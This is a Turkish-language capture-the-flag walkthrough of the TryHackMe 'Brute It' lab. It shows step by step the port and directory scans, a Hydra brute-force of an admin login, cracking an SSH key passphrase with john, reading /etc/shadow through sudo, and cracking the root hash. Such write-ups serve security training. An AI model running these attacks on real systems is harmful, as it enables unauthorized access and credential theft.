Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Brute It” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-05 18:53 +03
Nmap scan report for 10.10.14.251
Host is up (0.078s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2 — gobuster aracını kullanarak web sayfasında dizin taraması yapıyorum.
> gobuster dir -u http://10.10.14.251/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.14.251/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/05 18:55:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.14.251/admin/]
3 — Admin dizinine gittiğim zaman bir giriş sayfası karşıma çıkıyor. Hydra aracı ile bir parola saldırısı yapıyorum.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.14.251 http-post-form "/admin/index.php:user=admin&pass=^PASS^:Username or password invalid"
*
*
[80][http-post-form] host: 10.10.14.251 login: admin password: *CENSORED*
*
*
4 — Giriş yaptıktan sonra karşıma web bayrağı, “john” isminde bir kullanıcı ve RSA anahtarı karşıma çıkıyor. RSA anahtarını bir dosyaya kaydediyorum. John aracı ile RSA anahtarının parolasını kırıyorum.
> ssh2john id_rsa > hash
> john hash -w=/usr/share/wordlists/rockyou.txt
5 — id_rsa dosyasına okuma izni verip ssh bağlantısını sağlıyorum. Daha sonra ilk bayrağımı elde ediyorum.
> chmod 400 id_rsa
> ssh -i id_rsa john@10.10.14.251
*
*
Last login: Wed Sep 30 14:06:18 2020 from 192.168.1.106
john@bruteit:~$ ls
user.txt
john@bruteit:~$ cat user.txt
***CENSORED***
john@bruteit:~$
6 — “sudo -l” komutu ile sudo yetkisi ile çalıştırabileceğim komutları görüntülüyorum. “cat” komutunu kullanarak root dizinindeki bayrağı direkt elde edebilirim. Bunun yerine ben root kullanıcısına geçmek için shadow dosyasını okuyorum. Root kullanıcısının hashini elde edip “john” aracı ile tekrar parola saldırısı yapıyorum.
john@bruteit:~$ sudo cat /etc/shadow
root:$6$zdk0*************************
> john hash
*
*CENSORED* (root)
*
7 — Root kullanıcısına geçip ikinci bayrağı da elde ederek odayı tamamlıyorum.
john@bruteit:~$ su root
Password:
root@bruteit:/home/john# cat /root/root.txt
***CENSORED***